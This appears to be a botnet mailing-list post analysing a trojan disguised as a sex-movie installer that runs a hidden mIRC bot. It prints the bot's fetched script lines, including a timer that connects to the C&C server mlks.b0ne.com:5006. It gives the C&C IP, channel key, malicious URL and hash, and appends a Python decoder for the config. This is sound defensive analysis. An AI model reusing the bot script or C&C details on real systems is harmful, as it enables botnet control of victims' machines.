To report a botnet PRIVATELY please email: [EMAIL PROTECTED]

----------

I came across a malicious binary via a link to the following:

    http://82.38.6.249:5200/sex

At this point, it looks like the IP for the malware has changed; I'll let the group know when I discover the new address.
The file installs a program that supposedly allows you to watch sex movies on your PC. Preliminary analysis of the file shows the following:

* The program launches what looks to be a legitimate Windows installer program.

* Upon completion of the installation, an mIRC client is launched in the background which connects to IRC.

* The pcap of the network session shows that a configuration or mIRC scripting file of some kind is grabbed from www.geocities.com/xA1r5/rehaz.htm. There are actually 5 locations from which a file can be grabbed: www.geocities.com/xA1r?/rehaz.htm, where ? is 1-5.

* After wget of the file, the following is noted:

    za!r /.tmd
    ZA!r /.rd1 typecon type 3
    za!r /.rd1 typecon typed KJlj0OnlkJnkmeljjnkJ908N-kmlOOM;/!tojHNJHN.kmn9ygkl89HB.AtHKJJSDAJDS.KAJD.AS JDcxKJD
    za!r /.rd1 wcnt 1 4,2
    za!r /.rd1 wcnt 2 9,2
    za!r /.rd1 wcnt 3 17,1
    za!r /.rd1 webcodes posa 5
    za!r /.rd1 webcodes webcode5 F!PxAl321r47jKlU57kLW/Ilo0rnbKJjkIjeh7698sfl
    za!r /.rd1 webcodes webcode4 F!PxAl321r47jKlU47kLW/Ilo0rnbKJjkIjeh7698sfl
    za!r /.rd1 webcodes webcode3 F!PxAl321r47jKlU37kLW/Ilo0rnbKJjkIjeh7698sfl
    za!r /.rd1 webcodes webcode2 FokxAl321r47jKlU27ko!/Ilo0rnbKJjkIjeh76fNalz
    za!r /.rd1 webcodes webcode1 FokxAl321r47jKlU17ko!/Ilo0rnbKJjkIjeh76fNalz
    za!r /.rd1 cntserv 1 13,1
    za!r /.rd1 cntserv 2 8,2
    za!r /.rd1 cntserv 3 68,1
    za!r /.rd srv LkIwbmUuY29t
    za!r /.rd prt NTAwNg==
    za!r /.timer 1 3 $iif(warnet != $network,.server mlks.b0ne.com 5006)

* The srv LkIwbmUuY29t and prt NTAwNg== lines appear to be base64 encoded, which when decoded yield .B0ne.com and 5006. This file most likely allows the bot operator to control the mIRC client via the web page file. If he needs to modify the behavior of the client, he can do it via the web page file.

* During the launch of the mIRC client on the infected computer, Windows Media Player starts and displays a frame of a sex movie.
* The format of the NICK and USER strings does not appear to be random characters, as multiple execution runs of the file yielded English words as segments of the USER string, and the NICK strings seemed to have a pattern to them as well.

* It does not appear to be possible to properly join the channel unless certain MODE and WATCH commands are passed.

I will continue to monitor the bot and study the malware and the config files to try and obtain more information. At this point, the bot is pretty quiet; I have only seen the following command over the past few hours:

    [WARNET] (86.137.160.146:5006) -> :[EMAIL PROTECTED] MODE #.war. -b *!*@212.21.*

If anyone can shed any further light on the commands shown in the config file above, it would be a huge help.

The following is the C&C information I have so far:

    Server hostname: mlks.b0ne.com
    Server IP:       86.137.160.146
    Port:            5006
    Server Password: [none]
    NICK string:     Teh-Wei
    USER string:     Eeke "hotmail.com " "mlks.b0ne.com" :Hi! I'm a human! What are you?
    Channel:         #.War.
    Channel Key:     svcexe
    Bot population:  ~200

Report on Sex_Movies.avi.exe
********************************************
    MD5:         e867443d92ae809cc12150375d43bbf2
    AVG:         No Virus Found
    BitDefender: No Virus Found
    ClamAV:      Trojan.Muldrop.744
    F-Prot:      No Virus Found

Andre'
--
SemperSecurus

_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
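As an added example that is not part of the post above, the following Python script shows how a responder could pull the C&C address out of the fetched "za!r" script lines mechanically rather than by eye: each /.rd and /.rd1 line is split into a key path and a trailing value, every value is tried as base64 (only the srv and prt values decode cleanly to printable text; the webcode and count fields do not), and the host/port recovered that way is cross-checked against the hard-coded ".server host port" fallback in the /.timer line. The sample input is constructed from the lines quoted in the post; the "za!r" prefix and the /.rd, /.rd1 and /.timer command names are taken from those lines, and the assumption that the last token of each line is the value is mine.

```python
import base64
import binascii
import re

# Constructed sample input: the script lines quoted in the post that bear on
# the C&C address, in the form the bot fetches them from the web page.
SAMPLE_CONFIG = """\
za!r /.tmd
za!r /.rd1 typecon type 3
za!r /.rd1 wcnt 1 4,2
za!r /.rd1 webcodes webcode1 FokxAl321r47jKlU17ko!/Ilo0rnbKJjkIjeh76fNalz
za!r /.rd1 cntserv 1 13,1
za!r /.rd srv LkIwbmUuY29t
za!r /.rd prt NTAwNg==
za!r /.timer 1 3 $iif(warnet != $network,.server mlks.b0ne.com 5006)
"""

PREFIX = "za!r "  # every command line in the fetched file starts with this


def parse_lines(text):
    """Split 'za!r /.cmd rest' lines into (command, rest) pairs; skip anything else."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(PREFIX):
            continue
        cmd, _, rest = line[len(PREFIX):].partition(" ")
        entries.append((cmd, rest))
    return entries


def try_b64(token):
    """Return the decoded string if token is valid base64 for printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def decode_fields(text):
    """Map each /.rd and /.rd1 key path to (raw value, decoded value or None).

    Assumption (not stated in the post): the last whitespace-separated token
    is the stored value and everything before it is the key path.
    """
    fields = {}
    for cmd, rest in parse_lines(text):
        if cmd not in ("/.rd", "/.rd1"):
            continue
        tokens = rest.split()
        if len(tokens) < 2:
            continue
        key = " ".join(tokens[:-1])
        value = tokens[-1]
        fields[key] = (value, try_b64(value))
    return fields


def timer_server(text):
    """Pull (host, port) from the '.server host port' embedded in the /.timer line."""
    for cmd, rest in parse_lines(text):
        if cmd == "/.timer":
            m = re.search(r"\.server\s+(\S+)\s+(\d+)", rest)
            if m:
                return m.group(1), int(m.group(2))
    return None


def c2_summary(text):
    """Cross-check the decoded srv/prt values against the hard-coded timer fallback."""
    fields = decode_fields(text)
    srv = fields.get("srv", ("", None))[1] or ""
    prt = fields.get("prt", ("", None))[1] or ""
    timer = timer_server(text)
    agrees = (timer is not None
              and timer[0].lower().endswith(srv.lower())
              and str(timer[1]) == prt)
    return {"srv": srv, "prt": prt, "timer": timer, "agrees": agrees}


if __name__ == "__main__":
    for key, (raw, decoded) in decode_fields(SAMPLE_CONFIG).items():
        print(f"{key:24} {raw:48} -> {decoded!r}")
    print(c2_summary(SAMPLE_CONFIG))
```

Running it on the sample shows srv decoding to the domain suffix ".B0ne.com" and prt to "5006", with the timer line's fallback "mlks.b0ne.com 5006" agreeing with both; the webcode and count values are reported as undecodable, which matches the post's observation that only the two /.rd lines look like base64.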
